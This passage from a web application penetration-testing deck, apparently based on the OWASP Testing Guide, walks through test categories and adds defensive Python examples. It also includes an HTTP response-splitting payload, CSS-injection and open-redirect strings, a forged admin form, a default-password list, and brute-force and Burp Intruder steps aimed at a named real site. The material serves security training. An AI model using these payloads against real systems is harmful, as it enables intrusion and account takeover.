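    """Hardened version of something.php?dir=: the value is passed as a single
    argv element (no shell) after the same document-root check, so ';' is just
    part of a directory name that does not exist."""
    return ["ls", "--", resolve_document(directory)]
```

Two points a practitioner should take from this: normalising the path is not enough on its own (the commonpath check is what actually enforces the root), and for commands the fix is not escaping metacharacters but removing the shell from the call path entirely.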
HTTP splitting: the value sent in the interface parameter is

advanced%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a<html>Sorry,%20System%20Down</html>

The resulting answer from the vulnerable application will therefore be the following:

HTTP/1.1 302 Moved Temporarily
Date: Sun, 03 Dec 2005 16:22:19 GMT
Location: http://victim.com/main.jsp?interface=advanced
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 35

<html>Sorry,%20System%20Down</html>
<other data>
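Added example (not from the deck or OWASP) for the response-splitting payload above and the IMAP injection on the earlier slide: both are CR/LF injection, so one validation covers them. The vulnerable Location builder, the parser that shows a cache seeing two responses, and the forged body are constructed for the demo; the payload is rebuilt with a Content-Length that matches the forged body and assumes the server has already URL-decoded the parameter.

```python
class BadValue(ValueError):
    pass


def build_redirect_vulnerable(interface):
    """Reproduces the flaw from the slide: the interface parameter is written
    straight into the Location header."""
    return (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        f"Location: http://victim.com/main.jsp?interface={interface}\r\n"
        "Content-Length: 0\r\n\r\n"
    )


def build_redirect_safe(interface):
    """Same response, but a value carrying CR or LF is refused before it
    reaches a header line."""
    if "\r" in interface or "\n" in interface:
        raise BadValue("CR/LF in header value")
    return build_redirect_vulnerable(interface)


def build_imap_fetch(tag, message_id):
    """Same defence for the IMAP case on the earlier slide: message_id must be a
    plain number, so '4791 BODY[HEADER]\\r\\nV100 CAPABILITY...' is refused."""
    if not message_id.isdigit():
        raise BadValue("message id must be numeric")
    return f"{tag} FETCH {message_id} BODY[HEADER]\r\n"


def parse_responses(raw):
    """Split a stream into (status line, headers, body) the way a naive proxy or
    cache would, using Content-Length to find where each body ends."""
    responses, rest = [], raw
    while rest.startswith("HTTP/"):
        head, _, rest = rest.partition("\r\n\r\n")
        status, *header_lines = head.split("\r\n")
        headers = dict(line.split(": ", 1) for line in header_lines)
        length = int(headers.get("Content-Length", "0"))
        body, rest = rest[:length], rest[length:]
        responses.append((status, headers, body))
    return responses


# The slide's payload, rebuilt with the URL-decoding the server applies and a
# Content-Length that matches the forged body.
FAKE_BODY = "<html>Sorry, System Down</html>"
INJECTED = (
    "advanced\r\nContent-Length: 0\r\n\r\n"
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
    f"Content-Length: {len(FAKE_BODY)}\r\n\r\n{FAKE_BODY}"
)


def rejected(fn, *args):
    """True if fn refuses the arguments with BadValue."""
    try:
        fn(*args)
        return False
    except BadValue:
        return True
```

The parser is what a shared cache between attacker and victim does: it reads the first (empty) response, then treats the forged 200 as the answer to the next request on the connection, which is how the "System Down" page gets cached under the victim's URL.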
1. Analysis of Error Codes
2. Analysis of Stack Traces
1. Testing for Weak SSL/TLS Ciphers, Insufficient Transport Layer Protection
2. Testing for Padding Oracle
3. Testing for Sensitive information sent via unencrypted channels
1. Test time synchronisation
2. Test user-viewable log of authentication events
HTTP/1.1 200 OK
Date: Tue, 15 Oct 2013 14:11:09 GMT
Server: Apache
X-Frame-Options: Deny
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Language: en
Vary: Accept-Encoding,Cookie
Expires: Wed, 16 Oct 2013 14:11:09 GMT
Cache-Control: max-age=86400
Content-Encoding: gzip
Content-Type: text/html; charset=UTF-8
1. Testing for DOM based Cross Site Scripting
2. Testing for JavaScript Execution
3. Testing for HTML Injection
4. Testing for Client Side URL Redirect
5. Testing for CSS Injection
6. Testing for Client Side Resource Manipulation
7. Test Cross Origin Resource Sharing
8. Testing for Cross Site Flashing
9. Testing for Clickjacking
10. Testing WebSockets
11. Test Web Messaging
12. Test Local Storage
Client-side URL redirect examples:
http://www.victim.site/?#www.malicious.site
http://m.microsoft.com/library/linktrack.aspx?durl=xxxxxxxxxxxx
http://login.live.com/wlogin.srf?appid=00000000xxxxxxxx&alg=wsignin1.0&appctx=retUrl=xxxxx.xxxx/xxxx.xxx
CSS injection payloads:
www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current;   (Opera [8,12])
www.victim.com/#red;-:expression(alert(URL=1));   (IE 7/8)

Client-side resource manipulation sinks:
Resource Type   Tag/Method                        Sink
Frame           iframe                            src
Link            a                                 href
AJAX Request    xhr.open(method, [url], true);    URL
CSS             link                              href
Image           img                               src
Object          object                            data
Script          script                            src
HTTP/1.1 200 OK
Date: Mon, 07 Oct 2013 18:57:53 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u3
Access-Control-Allow-Origin: *
Content-Length: 4
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: application/xml

[Response Body]

Access-Control-Allow-Origin: * lets any web origin read this response; verify that it is not returned for resources that carry user-specific data.
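Added example (not from the deck): one audit routine over the response headers the deck examines in several places, HSTS (Strict-Transport-Security), the cache-control directives for sensitive pages, the Secure and HttpOnly cookie flags, X-Frame-Options for clickjacking, and the Access-Control-Allow-Origin wildcard above. The three sample responses are constructed from the responses shown on the slides, trimmed to the relevant headers; the finding texts and the https/sensitive flags are assumptions for the demo.

```python
# Constructed from the three responses shown on the slides, trimmed to the
# headers that matter; the status lines and values are the slides' own.
SAMPLE_SESSION_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Netscape-Enterprise/6.0\r\n"
    "Set-Cookie: USER=aW78ryrGrTWs4MnOd32Fs51yDqp; path=/; domain=www.example.com\r\n"
    "Set-Cookie: SESSION=k+KmKeHXTgDi1J5fT7Zz; path=/; domain=www.example.com\r\n"
    "Cache-Control: no-cache\r\n"
    "Pragma: No-cache\r\n"
    "Content-Type: text/html\r\n\r\n"
)
SAMPLE_HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "X-Frame-Options: Deny\r\n"
    "X-XSS-Protection: 1; mode=block\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Cache-Control: max-age=86400\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n\r\n"
)
SAMPLE_CORS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.22 (Debian)\r\n"
    "X-Powered-By: PHP/5.4.4-14+deb7u3\r\n"
    "Access-Control-Allow-Origin: *\r\n"
    "Content-Type: application/xml\r\n\r\n"
)


def parse_raw_response(raw):
    """Status line plus a list of (lowercased name, value) pairs; a list, not a
    dict, because Set-Cookie legitimately repeats."""
    head = raw.split("\r\n\r\n", 1)[0]
    status, *lines = head.split("\r\n")
    headers = []
    for line in lines:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status, headers


def audit_response(raw, https=True, sensitive=True):
    """Return the findings a tester would write up for one response.
    https: the page was served over TLS (HSTS and the Secure flag apply).
    sensitive: the page carries user-specific data (must not be cached)."""
    _, headers = parse_raw_response(raw)

    def values(name):
        return [v for n, v in headers if n == name]

    findings = []
    if https and not values("strict-transport-security"):
        findings.append("missing Strict-Transport-Security")
    csp = " ".join(values("content-security-policy"))
    if not values("x-frame-options") and "frame-ancestors" not in csp:
        findings.append("no clickjacking protection (X-Frame-Options or CSP frame-ancestors)")
    if "nosniff" not in " ".join(values("x-content-type-options")).lower():
        findings.append("missing X-Content-Type-Options: nosniff")
    cache = " ".join(values("cache-control")).lower()
    if sensitive and "no-store" not in cache and "no-cache" not in cache:
        findings.append("sensitive content cacheable (Cache-Control lacks no-store/no-cache)")
    if any(v.strip() == "*" for v in values("access-control-allow-origin")):
        findings.append("CORS allows any origin (Access-Control-Allow-Origin: *)")
    for cookie in values("set-cookie"):
        name = cookie.split("=", 1)[0].strip()
        attrs = {part.strip().split("=", 1)[0].lower() for part in cookie.split(";")[1:]}
        if https and "secure" not in attrs:
            findings.append(f"cookie {name} lacks Secure")
        if "httponly" not in attrs:
            findings.append(f"cookie {name} lacks HttpOnly")
    return findings
```

Feed it the raw responses saved from the proxy; the https and sensitive flags matter because an HSTS or Secure finding on a plain-HTTP test page, or a caching finding on a public static page, would be noise in the report.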
iframe1.contentWindow.postMessage("Hello world", "http://www.example.com");
The second argument is the target origin; a wildcard "*" delivers the message to whatever page is loaded in the frame, and the receiving side must check event.origin before trusting the data.
The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. OWASP's mission is to make software security visible, so that individuals and organizations worldwide can make informed decisions about true software security risks.
Net-Square Solutions Private Limited is a niche information security service provider, focused on the technology-based areas of information security such as application and infrastructure security. Net-Square Solutions was founded by the internationally experienced information security specialist Saumil Shah in the year 2000. Since then, Net-Square has conducted many assignments for some of the best organizations in the world, in sectors ranging from banking and financial services to telecom, retail and pharmaceuticals.

Web application vulnerability assessment

  • 2.
    o A penetrationtest is a method of evaluating the security of a computer system or network by simulating an attack. o A Web Application Penetration Test focuses only on evaluating the security of a web application. o The process involves an active analysis of the application for any weaknesses, technical flaws, or vulnerabilities. o Any security issues that are found will be presented to the system owner together with an assessment of their impact and often with a proposal for mitigation or a technical solution. 2
  • 3.
    o What isa vulnerability? A vulnerability is a flaw or weakness in a system's design, implementation, or operation and management that could be exploited to violate the system's security policy. • A threat is a potential attack that, by exploiting a vulnerability, may harm the assets owned by an application (resources of value, such as the data in a database or in the file system). • A test is an action that tends to show a vulnerability in the application. And Vulnerability is everywhere !! 3
  • 4.
  • 5.
    The OWASP WebApplication Penetration Testing method is based on the black box approach. The tester knows nothing or very little information about the application to be tested. The testing model consists of: o Tester: Who performs the testing activities o Tools and methodology: The core of this Testing Guide project o Application: The black box to test 5
  • 6.
    The test isdivided into 2 phases: 1. Passive mode 2. Active mode In the passive mode, the tester tries to understand the application's logic, and plays with the application. Tools can be used for information gathering. At the end of this phase, the tester should understand all the access points (gates) of the application 6
  • 7.
    In this phase,the tester begins to test using the methodology. We have split the set of active tests in 12 sub-categories for a total of 91 controls: I. Information Gathering II. Configuration and Deploy Management Testing III. Identity Management Testing IV. Authentication Testing V. Authorization Testing VI. Session Management Testing VII. Data Validation Testing VIII. Error Handling IX. Cryptography X. Logging XI. Business Logic Testing XII. Client Side Testing 7
  • 8.
  • 9.
    1. Conduct SearchEngine Discovery and Reconnaissance for Information Leakage 2. Fingerprint Web Server 3. Review Webserver Metafiles for Information Leakage 4. Enumerate Applications on Webserver 5. Review Webpage Comments and Metadata for Information Leakage 6. Identify application entry points 7. Map execution paths through application 8. Fingerprint Web Application Framework 9. Fingerprint Web Application 10. Map Network and Application Architecture 9
  • 10.
  • 11.
    Using a searchengine, search for: [1] Network diagrams and configurations [2] Archived posts and emails by administrators and other key staff [3] Logon procedures and username formats [4] User names and passwords [5] Error message content [6] Development, test, UAT and staging versions of the website Queries are put in several categories: Footholds Files containing usernames Sensitive Directories Web Server Detection Vulnerable Files Vulnerable Servers Error Messages Files containing juicy info Files containing passwords Sensitive Online Shopping Info 11
  • 12.
  • 13.
    Knowing the versionand type of a running web server allows testers to determine known vulnerabilities and the appropriate exploits to use during testing. 13
  • 14.
    robots.txt file forInformation Leakage of the web application's directory/folder path(s). 14
  • 15.
    Testing for webapplication vulnerabilities is to find out which particular applications are hosted on a web server 15
  • 16.
  • 17.
  • 18.
    Review webpage commentsand metadata to better understand the application and to find any information leakage. 18
  • 19.
    Step 1) Navigateto http://app.utu.ac.in/ and Intercept that same request using BURP Suite and send request into Intruder. 19
  • 20.
    Step 2) Goto "Position" tab and select "GET" and click on "ADD" button 20
  • 21.
    Step 3) Goto "Payloads" tab and select "HTTP Verbs" in to the Payload Options category 21
  • 22.
    Step 4) Select"Intruder" Menu and select "Start attack" option 22
  • 23.
  • 24.
  • 25.
  • 26.
  • 27.
  • 28.
  • 29.
    Cookie default namecontain its framework Word press directory structure More different framework cookie name refer : Page 75-76 (Documentation) 29
  • 30.
    Currently one ofthe best fingerprinting tools on the market. Included in a default Kali Linux build 30
  • 31.
    This great toolworks on the principle of static file checksum based version difference thus providing a very high quality of fingerprinting. Language: Python 31
  • 32.
    Wapplyzer is aFirefox/Chrome plug-in 32
  • 33.
    Web server fingerprintingis a critical task for the Penetration tester. Knowing the version and type of a running web server allows testers to determine known vulnerabilities and the appropriate exploits to use during testing. Nmap version detection offers a lot of advanced features that can help in determining services that are running on a given host, it obtains all data by connecting to open ports and interrogating them by using probes that the specific services understand. 33
  • 34.
    • List allthe possible administrative interfaces. • Determine if administrative interfaces are available from an internal network or are also available from the Internet. Firewall/IDS Identifier script 34
  • 35.
    1. Test Network/Infrastructure Configuration
    2. Test Application Platform Configuration
    3. Test File Extensions Handling for Sensitive Information
    4. Backup and Unreferenced Files for Sensitive Information
    5. Enumerate Infrastructure and Application Admin Interfaces
    6. Test HTTP Methods
    7. Test HTTP Strict Transport Security
    8. Test RIA cross domain policy
  • 36.
    Proper configuration management of the web server infrastructure is very important in order to preserve the security of the application itself. If elements such as the web server software, the back-end database servers, or the authentication servers are not properly reviewed and secured, they might introduce undesired risks or new vulnerabilities that might compromise the application itself.
    1. WebSEAL, also known as Tivoli Authentication Manager, is a reverse proxy from IBM which is part of the Tivoli framework.
    2. There are some GUI-based administration tools for Apache (like NetLoony) but they are not in widespread use yet.
  • 37.
    1. Handle server errors (40x or 50x) with custom-made pages instead of with the default web server pages.
    2. Logging information
    3. Keep in mind that all users can read .NET Framework machine.config and root web.config files by default.
    4. Only enable server modules (ISAPI extensions in the IIS case) that are needed for the application.
  • 38.
    Many web servers and application servers provide, in a default installation, sample applications and files that are provided for the benefit of the developer and in order to test that the server is working properly right after installation. However, many default web server applications have later become known to be vulnerable. This was the case, for example, for CVE-1999-0449 (Denial of Service in IIS when the Exair sample site had been installed), CAN-2002-1744 (Directory traversal vulnerability in CodeBrws.asp in Microsoft IIS 5.0), CAN-2002-1630 (Use of sendmail.jsp in Oracle 9iAS), or CAN-2003-1172 (Directory traversal in the view-source sample in Apache's Cocoon).
  • 39.
  • 40.
    When each file stem is tested, Burp checks for various different extensions, according to these settings.
  • 41.
    While most of the files within a web server are directly handled by the server itself, it isn't uncommon to find unreferenced and/or forgotten files that can be used to obtain important information about either the infrastructure or the credentials. The same test as above, but only for backup information.
  • 42.
    THC-Hydra for a brute force attack
    1) Set the target port number or protocol
    2) Add the username and password lists
  • 43.
    3) Start the attack; after some time we are able to get the root user's password
  • 44.
  • 45.
    The use of this header by web applications must be checked to know whether the following security issues could be produced:
    • Attackers sniffing the network traffic and accessing the information transferred through an unencrypted channel.
    • Attackers exploiting a man in the middle attack because of the problem of accepting certificates that are not trusted.
    • Users who mistakenly entered an address in the browser putting HTTP instead of HTTPS, or users who click on a link in a web application which mistakenly indicated the http protocol.
    HSTS header: Strict-Transport-Security: max-age=60000; includeSubDomains
  • 46.
    Rich Internet Applications (RIA) have adopted Adobe's crossdomain.xml policy files in order to allow for controlled cross-domain access to data and service consumption using technologies such as Oracle Java, Silverlight, and Adobe Flash.
  • 47.
    1. Test Role Definitions
    2. Test User Registration Process
    3. Test Account Provisioning Process
    4. Testing for Account Enumeration and Guessable User Account
    5. Testing for Weak or unenforced username policy
  • 48.
    ROLE           PERMISSION   OBJECT             CONSTRAINTS
    Administrator  Read         Customer records
    Manager        Read         Customer records   Only records related to business unit
    Staff          Read         Customer records   Only records associated with customers assigned by Manager
    Customer       Read         Customer record    Only own record
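The matrix above is only useful if the CONSTRAINTS column is enforced server-side for every read. The following is an added example, not code from the deck or from any product, that encodes the four rows as predicates and filters a record set with them; the type and function names (CustomerRecord, User, can_read, readable_records) and the sample records are assumptions made for the example.

```python
"""Role/permission matrix with per-object constraints (added example).

Every role may read customer records, but Manager, Staff and Customer are
restricted to a subset, exactly as the slide's CONSTRAINTS column says.
Unknown roles get nothing (deny by default).
"""
from dataclasses import dataclass, field


@dataclass(frozen=True)
class CustomerRecord:
    record_id: str
    business_unit: str
    owner_user_id: str                      # the customer this record belongs to
    assigned_staff: frozenset = field(default_factory=frozenset)  # set by a Manager


@dataclass(frozen=True)
class User:
    user_id: str
    role: str                               # Administrator, Manager, Staff or Customer
    business_unit: str = ""


# CONSTRAINTS column, expressed as predicates over (user, record).
ROLE_CONSTRAINTS = {
    "Administrator": lambda u, r: True,                                # no constraint
    "Manager":       lambda u, r: r.business_unit == u.business_unit,  # own business unit
    "Staff":         lambda u, r: u.user_id in r.assigned_staff,       # assigned by Manager
    "Customer":      lambda u, r: r.owner_user_id == u.user_id,        # only own record
}


def can_read(user, record):
    """True only if the role exists in the matrix and its constraint holds."""
    constraint = ROLE_CONSTRAINTS.get(user.role)
    if constraint is None:
        return False
    return constraint(user, record)


def readable_records(user, records):
    """Filter server-side; never rely on the client to hide rows it was sent."""
    return [r for r in records if can_read(user, r)]


# Constructed sample data for the demonstration.
RECORDS = [
    CustomerRecord("C-1", "retail", "cust-1", frozenset({"staff-1"})),
    CustomerRecord("C-2", "retail", "cust-2"),
    CustomerRecord("C-3", "telecom", "cust-3", frozenset({"staff-1"})),
]
ADMIN = User("admin-1", "Administrator")
MANAGER = User("mgr-1", "Manager", "retail")
STAFF = User("staff-1", "Staff", "retail")
CUSTOMER = User("cust-2", "Customer")
GUEST = User("guest", "Guest")             # role absent from the matrix

if __name__ == "__main__":
    for who in (ADMIN, MANAGER, STAFF, CUSTOMER, GUEST):
        print(who.role, [r.record_id for r in readable_records(who, RECORDS)])
```

When testing role definitions, the check is to log in as each role and confirm that the rows returned match what this filter would produce, including an empty result for roles the matrix does not list.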
  • 49.
  • 50.
    • Verify the identity requirements for user registration align with business/security requirements
    • Validate the registration process
  • 51.
  • 52.
    Verify which accounts may provision other accounts and of what type
  • 53.
    CN000100
    CN000101
    ….
    R1001 – user001 for REALM1
    R2001 – user001 for REALM2
  • 54.
    User account names are often highly structured (e.g. Joe Bloggs' account name is jbloggs and Fred Nurks' account name is fnurks) and valid account names can easily be guessed.
  • 55.
    1. Testing for Credentials Transported over an Encrypted Channel
    2. Testing for default credentials
    3. Testing for Weak lock out mechanism
    4. Testing for bypassing authentication schema
    5. Test remember password functionality
    6. Testing for Browser cache weakness
    7. Testing for Weak password policy
    8. Testing for Weak security question/answer
    9. Testing for weak password change or reset functionalities
    10. Testing for Weaker authentication in alternative channel
  • 56.
  • 57.
    The GET request sends the credentials
  • 58.
    User           Password
    Tester         Tester
    Webmaster      Webmaster
    Admin          Admin123
    System         System
    Administrator  admin
    ……             …….
  • 59.
    Accounts are typically locked after 3 to 5 unsuccessful login attempts and can only be unlocked after a predetermined period of time, via a self-service unlock mechanism, or by intervention of an administrator.
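The lockout policy just described, as an added example in Python (not code from the deck): consecutive failures are counted per account, the account locks at the threshold, and it unlocks either when the lockout window has passed or when an administrator clears it. A locked account answers "locked" even to the correct password, so the lock state cannot be used to confirm a guess. LoginGuard, verify_password, the salted-hash user store and the fake clock are constructed for this example.

```python
"""Account lockout after N failed logins with timed unlock (added example)."""
import hashlib
import hmac
import time


class LoginGuard:
    def __init__(self, max_failures=5, lockout_seconds=900, clock=time.monotonic):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.clock = clock                   # injectable so tests can control time
        self._failures = {}                  # username -> consecutive failures
        self._locked_until = {}              # username -> clock value

    def is_locked(self, username):
        until = self._locked_until.get(username)
        if until is None:
            return False
        if self.clock() >= until:            # lockout period elapsed: self-service unlock
            self._clear(username)
            return False
        return True

    def login(self, username, password, verify):
        """verify(username, password) -> bool is the real credential check.

        Returns "ok", "locked" or "bad_credentials".
        """
        if self.is_locked(username):
            return "locked"
        if verify(username, password):
            self._clear(username)            # success resets the counter
            return "ok"
        n = self._failures.get(username, 0) + 1
        self._failures[username] = n
        if n >= self.max_failures:
            self._locked_until[username] = self.clock() + self.lockout_seconds
            return "locked"
        return "bad_credentials"

    def admin_unlock(self, username):
        """Administrator intervention: clears both the lock and the counter."""
        self._clear(username)

    def _clear(self, username):
        self._failures.pop(username, None)
        self._locked_until.pop(username, None)


# Constructed user store; salted SHA-256 stands in for a real password hash.
_SALT = b"example-salt"
_USERS = {"alice": hashlib.sha256(_SALT + b"correct horse").hexdigest()}


def verify_password(username, password):
    expected = _USERS.get(username)
    if expected is None:
        return False
    actual = hashlib.sha256(_SALT + password.encode()).hexdigest()
    return hmac.compare_digest(expected, actual)   # constant-time comparison


class FakeClock:
    """Deterministic clock so the demo does not have to wait 15 minutes."""
    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now


def demo():
    """Five wrong guesses lock the account; it unlocks after the window."""
    clock = FakeClock()
    guard = LoginGuard(max_failures=5, lockout_seconds=900, clock=clock)
    outcomes = [guard.login("alice", "wrong", verify_password) for _ in range(5)]
    outcomes.append(guard.login("alice", "correct horse", verify_password))  # still locked
    clock.now += 900
    outcomes.append(guard.login("alice", "correct horse", verify_password))  # unlocked
    return outcomes
```

The test for a weak lockout mechanism is the inverse of this demo: keep submitting wrong passwords and note whether the application ever stops answering "bad credentials", and whether the lock is released sooner than the documented period.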
  • 60.
    There are several methods to bypass the authentication schema in use by a web application:
    • Direct page request (forced browsing)
    • Parameter modification
    • Session ID prediction
    • SQL injection
  • 61.
  • 62.
    • Remember-password functionality stores your credentials in a cookie
    • You must check whether the credentials are encrypted or not
  • 63.
    Cache-Control: must-revalidate, pre-check=0, post-check=0, max-age=0, s-maxage=0
    HTTP/1.1: Cache-Control: no-cache
    HTTP/1.0: Pragma: no-cache
    Expires: <past date or illegal value (e.g., 0)>
  • 64.
    The most prevalent and most easily administered authentication mechanism is a static password. The password represents the keys to the kingdom, but is often subverted by users in the name of usability. In each of the recent high-profile hacks that have revealed user credentials, it is lamented that the most common passwords are still: 123456, password
  • 65.
    Pre-generated questions:
    • The majority of pre-generated questions are fairly simplistic in nature and can lead to insecure answers. For example:
    • The answers may be known to family members or close friends of the user, e.g. "What is your mother's maiden name?", "What is your date of birth?"
    • The answers may be easily guessable, e.g. "What is your favorite color?", "What is your favorite baseball team?"
    • The answers may be brute forcible, e.g. "What is the first name of your favorite high school teacher?" - the answer is probably on some easily downloadable lists of popular first names, and therefore a simple brute force attack can be scripted.
    • The answers may be publicly discoverable, e.g. "What is your favorite movie?" - the answer may easily be found on the user's social media profile page.
  • 66.
    In addition to the previous test it is important to verify: Is the old password requested to complete the change? The most insecure scenario here is if the application permits the change of the password without requesting the current password. Indeed, if an attacker is able to take control of a valid session, (s)he could easily change the victim's password.
  • 67.
  • 68.
    1. Testing Directory traversal/file include
    2. Testing for bypassing authorization schema
    3. Testing for Privilege Escalation
    4. Testing for Insecure Direct Object References
  • 69.
  • 70.
    • Is it possible to access that resource even if the user is not authenticated?
    • Is it possible to access that resource after the log-out?
    • Is it possible to access functions and resources that should be accessible to a user that holds a different role/privilege?
    POST /admin/addUser.jsp HTTP/1.1
    Host: www.example.com
    [other HTTP headers]

    userID=fakeuser&role=3&group=grp001
  • 71.
    POST /user/viewOrder.jsp HTTP/1.1
    Host: www.example.com
    ……

    groupID=grp001&orderID=0001
    Verify if a user that does not belong to grp001 can modify the value of the parameters ‘groupID’ and ‘orderID’ to gain access to that privileged data.
  • 72.
    HTTP/1.1 200 OK
    Server: Netscape-Enterprise/6.0
    Date: Wed, 1 Apr 2006 13:51:20 GMT
    Set-Cookie: USER=aW78ryrGrTWs4MnOd32Fs51yDqp; path=/; domain=www.example.com
    Set-Cookie: SESSION=k+KmKeHXTgDi1J5fT7Zz; path=/; domain=www.example.com
    Cache-Control: no-cache
    Pragma: No-cache
    Content-length: 247
    Content-Type: text/html
    Expires: Thu, 01 Jan 1970 00:00:00 GMT
    Connection: close

    <form name="autoriz" method="POST" action = "visual.jsp">
    <input type="hidden" name="profile" value="SysAdmin">
    <body onload="document.forms.autoriz.submit()">
    </td>
    </tr>
  • 73.
    Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object.
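The viewOrder request two slides back trusts groupID and orderID from the client, which is exactly the IDOR pattern defined here. As an added example (not code from the deck or any project), the Python below shows the two server-side defences a reviewer looks for: the caller's group is taken from the session and checked against the object before it is returned, and, alternatively, the client is given opaque per-session references instead of the raw database key. OrderService, Forbidden, the order table and the two sessions are constructed for the example.

```python
"""Ownership check and indirect references against IDOR (added example)."""
import secrets


class Forbidden(Exception):
    pass


class OrderService:
    def __init__(self, orders):
        self._orders = orders                 # order_id -> {"group_id": ..., ...}
        self._ref_maps = {}                   # session_id -> {opaque_ref: order_id}

    # (1) Direct reference, but authorised server-side.
    def view_order(self, session_user, order_id):
        """The caller's group comes from the session, never from the request body."""
        order = self._orders.get(order_id)
        if order is None or order["group_id"] != session_user["group_id"]:
            # Same answer for "does not exist" and "not yours": no enumeration oracle.
            raise Forbidden("order not accessible")
        return order

    # (2) Indirect reference map: the client never sees the real key.
    def list_orders(self, session_user):
        """Return opaque references for the orders this session may see."""
        ref_map = {}
        for order_id, order in self._orders.items():
            if order["group_id"] == session_user["group_id"]:
                ref_map[secrets.token_urlsafe(8)] = order_id
        self._ref_maps[session_user["session_id"]] = ref_map
        return list(ref_map)

    def view_by_ref(self, session_user, ref):
        ref_map = self._ref_maps.get(session_user["session_id"], {})
        order_id = ref_map.get(ref)
        if order_id is None:                  # a reference issued to another session is useless
            raise Forbidden("unknown reference")
        return self._orders[order_id]


# Constructed data: two groups, one order each.
ORDERS = {
    "0001": {"group_id": "grp001", "total": 42},
    "0002": {"group_id": "grp002", "total": 17},
}
ALICE = {"session_id": "s-alice", "group_id": "grp001"}
MALLORY = {"session_id": "s-mallory", "group_id": "grp002"}


def demo():
    svc = OrderService(ORDERS)
    owner_total = svc.view_order(ALICE, "0001")["total"]
    try:
        svc.view_order(MALLORY, "0001")       # tampered orderID from another group
        cross_group = "allowed"
    except Forbidden:
        cross_group = "denied"
    refs = svc.list_orders(ALICE)
    by_ref_total = svc.view_by_ref(ALICE, refs[0])["total"]
    try:
        svc.view_by_ref(MALLORY, refs[0])     # Alice's reference replayed by Mallory
        replayed_ref = "allowed"
    except Forbidden:
        replayed_ref = "denied"
    return owner_total, cross_group, by_ref_total, replayed_ref
```

The authorization test on the previous slide maps directly onto view_order: a second user with a different group submits the first user's groupID and orderID, and the expected result is the Forbidden branch, not the order.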
  • 74.
  • 75.
    1. Testing for Bypassing Session Management Schema
    2. Testing for Cookies attributes
    3. Testing for Session Fixation
    4. Testing for Exposed Session Variables
    5. Testing for Cross Site Request Forgery
    6. Testing for logout functionality
    7. Test Session Timeout
    8. Testing for Session puzzling
  • 76.
    If you have access to the session management schema implementation, you can check for the following:
    Random Session Token
    Token length
    Session Time-out
    Cookie configuration:
    o non-persistent: only RAM memory
    o secure (set only on HTTPS channel): Set-Cookie: cookie=data; path=/; domain=.aaa.it; secure
    o HTTPOnly (not readable by a script): Set-Cookie: cookie=data; path=/; domain=.aaa.it; HTTPOnly
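The three cookie properties in the checklist (non-persistent, secure, HTTPOnly) can be verified mechanically from a captured response. The following is an added example, not from the deck: it parses each Set-Cookie header and reports session cookies that are missing Secure or HttpOnly or that carry an Expires/Max-Age and so outlive the browser session. parse_set_cookie, audit_cookies, the list of session-cookie names and the sample headers are constructed for the example.

```python
"""Audit Set-Cookie headers for Secure, HttpOnly and persistence (added example)."""


def parse_set_cookie(header_value):
    """'name=value; attr; attr=value' -> (name, value, {attr_lower: value})."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        attrs[key.strip().lower()] = val.strip()   # attribute names are case-insensitive
    return name.strip(), value, attrs


def audit_cookies(set_cookie_headers, session_names=("sessionid", "jsessionid", "phpsessid")):
    """Return {cookie_name: [findings]} for the cookies that look like session tokens."""
    findings = {}
    for header in set_cookie_headers:
        name, _value, attrs = parse_set_cookie(header)
        if name.lower() not in session_names:
            continue                               # not a session cookie: out of scope here
        problems = []
        if "secure" not in attrs:
            problems.append("missing Secure: cookie is also sent over plain HTTP")
        if "httponly" not in attrs:
            problems.append("missing HttpOnly: readable by script")
        if "expires" in attrs or "max-age" in attrs:
            problems.append("persistent: survives closing the browser")
        findings[name] = problems
    return findings


# Constructed responses: one weak cookie, one set as the checklist recommends, one irrelevant.
SAMPLE_HEADERS = [
    "JSESSIONID=k+KmKeHXTgDi1J5fT7Zz; path=/; domain=www.example.com; "
    "Expires=Wed, 09 Jun 2027 10:18:14 GMT",
    "sessionid=abc123; Path=/; Domain=.aaa.it; Secure; HttpOnly",
    "lang=en; Path=/",
]

if __name__ == "__main__":
    for cookie, problems in audit_cookies(SAMPLE_HEADERS).items():
        print(cookie, problems or ["ok"])
```

Run it against the Set-Cookie lines of the login response; a session cookie with an empty finding list satisfies all three items of the checklist.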
  • 77.
  • 78.
  • 79.
  • 80.
  • 81.
    • How are Session IDs transferred? e.g., GET, POST, Form Field (including hidden fields)
    • Are Session IDs always sent over encrypted transport by default?
    • Is it possible to manipulate the application to send Session IDs unencrypted? e.g., by changing HTTP to HTTPS?
    • What cache-control directives are applied to requests/responses passing Session IDs?
    • Are these directives always present? If not, where are the exceptions?
    • Are GET requests incorporating the Session ID used?
    • If POST is used, can it be interchanged with GET?
  • 82.
    Request submission without any CSRF request token. A successful CSRF exploit can compromise end user data and operations when it targets a normal user. If the targeted end user is the administrator account, a CSRF attack can compromise the entire web application.
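The finding above is the absence of a request token; the control that closes it is a synchroniser token bound to the session. As an added example in Python (not code from the deck), CsrfProtector issues a random token per session when a form is rendered and rejects any state-changing request that does not carry the same token back. The class and method names and the sample requests are constructed for this example.

```python
"""Synchroniser token for CSRF protection (added example)."""
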